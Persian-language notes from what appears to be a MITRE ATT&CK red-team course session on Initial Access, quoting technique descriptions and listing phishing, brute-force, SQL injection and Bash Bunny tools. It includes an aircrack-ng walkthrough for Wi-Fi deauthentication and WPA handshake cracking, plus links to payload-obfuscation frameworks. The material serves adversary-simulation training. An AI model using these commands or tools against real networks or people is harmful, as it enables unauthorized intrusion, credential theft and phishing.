به جلسه سوم دوره مایتراتک خوش آمدید جهت دسترسی به ویدیو به لینک زیر مراجعه فرمایید:

Initial Access یا دسترسی اولیه مجموعه ای از تکنیک ها هستند که TA توسط آن ها نفوذ اولیه را انجام می دهند این تکنیک ها شامل Spearphishing  و اکسپلویتینگ نقاط ورودی می باشد. گاهی اوقات دسترسی اولیه با یک اکانت معتبر به سرقت رفته انجام می شود که توسط آن با قدرت یوزر ساده وارد شبکه می شوند و اقدامات بعدی را انجام می دهند.( کارمندان )

جهت گرفتن دسترسی اولیه در پروژه های سیمولیشن ابتدا باید TTP را مطالعه کنیم بالغ بر 90 درصد دسترسی های اولیه از طریق فیشینگ صورت گرفته است. فایل بدافزاری که در طی فیشینگ برای سازمان ها ارسال می شود بسیار مهم هست.

مجموعه از تکنیک هایی است که به هکر کمک می کند به شبکه داخلی دسترسی بگیرند.این تکنیک ها ممکن است از طریق فیشینگ، اکسپلویت آسیب پذیری و یا استفاده از یوزر و پسورد لیک شده یا خریداری شده استفاده می کنند.

ATT&CK – Initial Access (TA0001)

The adversary is trying to get into your network.

Initial Access consists of techniques that use various entry vectors to gain their initial foothold within a network. Techniques used to gain a foothold include targeted spearphishing and exploiting weaknesses on public-facing web servers. Footholds gained through initial access may allow for continued access, like valid accounts and use of external remote services, or may be limited-use due to changing passwords.

 

حمله watering hole attack یا drive by compromise یکی از سخت ترین حمله هاست چرا که نیازمند دسترسی از سایت خیلی معروف و آلوده سازی آن سایت جهت آلوده کردن قربانی ( کارمندان یک سازمان خاص) می باشد.

Drive-by Compromise  T1189 [Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user’s web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring Application Access Token.]

یکی دیگر از روش های دسترسی اولیه دسترسی از طریق درگاه ورودی سازمان می باشد هر زیرساختی از سازمان که روی اینترنت قرار گرفته باشد و امکان اکسپلویت کردن آن برای بازیگران تهدید وجود داشته باشد از فرصت برای نفوذ استفاده می کنند.

Exploit Public-Facing Application   T1190 [Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other applications with Internet accessible open sockets, such as web servers and related services. Depending on the flaw being exploited this may include Exploitation for Defense Evasion.]

External Remote Services  T1133 [Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as Windows Remote Management and VNC can also be used externally.]

Hardware Additions T1200 [Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. Replication Through Removable Media), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.]

0day به نام فیشینگ

«به یک نفر یک 0day بده اون برای مدت یک روز یک دسترسی خواهد داشت ولی اگر به او فیشینگ کردن را بیاموزی اون برای یک عمر دسترسی خواهد داشت.»

Phishing    T1566  [Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.]

    Spearphishing Attachment [Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon User Execution to gain execution. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.]

    Spearphishing Link [Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.]

    Spearphishing via Service [Adversaries may send spearphishing messages via third-party services in an attempt to gain access to victim systems. Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels.]

استفاده کردن از سخت افزارهای آلوده برای گرفتن دسترسی اولیه

Replication Through Removable Media  T1091 [Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media’s firmware itself.]

Supply Chain Compromise T1195 [Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.]

    Compromise Software Dependencies and Development Tools [Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency.]

    Compromise Software Supply Chain [Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.]

    Compromise Hardware Supply Chain [Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise. By modifying hardware or firmware in the supply chain, adversaries can insert a backdoor into consumer networks that may be difficult to detect and give the adversary a high degree of control over the system. Hardware backdoors may be inserted into various devices, such as servers, workstations, network infrastructure, or peripherals.]

Trusted Relationship    T1199 [Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.]

دسترسی اولیه با اکانت های معتبری که قبلا از دیتابیس های نشت شده استخراج شده اند یا خریداری شده اند.

Valid Accounts  T1078 [Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.]

    Default Accounts [Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.]

    Domain Accounts [Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.]

    Local Accounts [Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.]

    Cloud Accounts [Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory.]

 

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Brute force لیست ابزار ها

Dubrute

Nlbrute

Ncrack

Hydra

Ruler

Burp suite

 

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

ATT&CK – Initial Access (TA0001)

Aircrack-ng

Aircrack-ng

T1465 WIFI Access

T1110 Brute Force WPA

T1464  Denial of Service

airmon-ng

network adapter alpha

aireplay-ng –test wlan0mon

besside-ng wlan0

airmon-ng check kill

airmon-ng start wlan0

Airodump-ng wlan0mon

Airodump-ng wlan0mon –bssid –c –w ./capture

Aircrack-ng capture-01.pcap

airmon-ng stop wlan0mon

Aireplay-ng wlan0mon –deauth 20 –a “router” –h “compter”

Aircrack-ng –w wordlist wpa2.cap

airmon-ng start wlan0

airodump-ng wlan0

airodump-ng wlan0 –bssid 54:B8:0A:90:7B:B0 -c  8 -w ./capture

aireplay-ng wlan0mon –deauth 20 –a 54:B8:0A:90:7B:B0 –h D0:DF:9A:D8:A1:86

aircrack-ng capture-01.cap

wifit

 

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Luckystrike

https://github.com/curi0usJack/luckystrike/wiki

https://github.com/danielbohannon/Invoke-Obfuscation

Luckystrike

T1566 Phishing

T1566.001

Spearphishing Attachment

How to install luckystrike framework ?

Github

Install invoke-obfuscation requirement

Run as admin powershell version must be 5 or later use windows 10 or later

Get-host

 

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Gophish

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

sqlmap

 

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Bash Bunny

bashbunny-wiki/payload_development.md at master · hak5/bashbunny-wiki · GitHub

Quick creds

Windows meterpreter

Optical exfiltration

Wifipass

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

لیست ابزارها و سخت افزارها
هک وای فای :
AWUS036H (EOL)
WiFi Pineapple
https://www.raspberrypi.com/products/raspberry-pi-4-model-b/
https://beagleboard.org/black

هک توسط فلش درایو با بش بانی
https://github.com/hak5/bashbunny-payloads

فیشینگ با گوفیش که در قسمت قبل راه اندازی آموزش داده شد
https://github.com/gophish/gophish
برای راحتی فیشینگ از تمپلیت های کینگ فیشر
https://github.com/rsmusllp/king-phisher

ساخت پیلود به روش فوق العاده ساده
https://github.com/curi0usJack/luckystrike/
https://github.com/danielbohannon/Invoke-Obfuscation

اموزش راه اندازی لاکی استرایک
https://github.com/curi0usJack/luckystrike/wiki

نفوذ از طریق سرویس های روی اینترنت
sqli
https://github.com/sqlmapproject/sqlmap
https://github.com/digininja/DVWA

نفوذ از طریق بروت فورس توسط ابزارهای زیر
https://github.com/sensepost/ruler/wiki/Brute-Force
https://github.com/ch0sys/DUBrute
https://www.hybrid-analysis.com/sample/ffa28db79daca3b93a283ce2a6ff24791956a768cb5fc791c075b638416b51f4
https://github.com/vanhauser-thc/thc-hydra

مجموعه ابزارها:
https://t.me/Peneter_Tools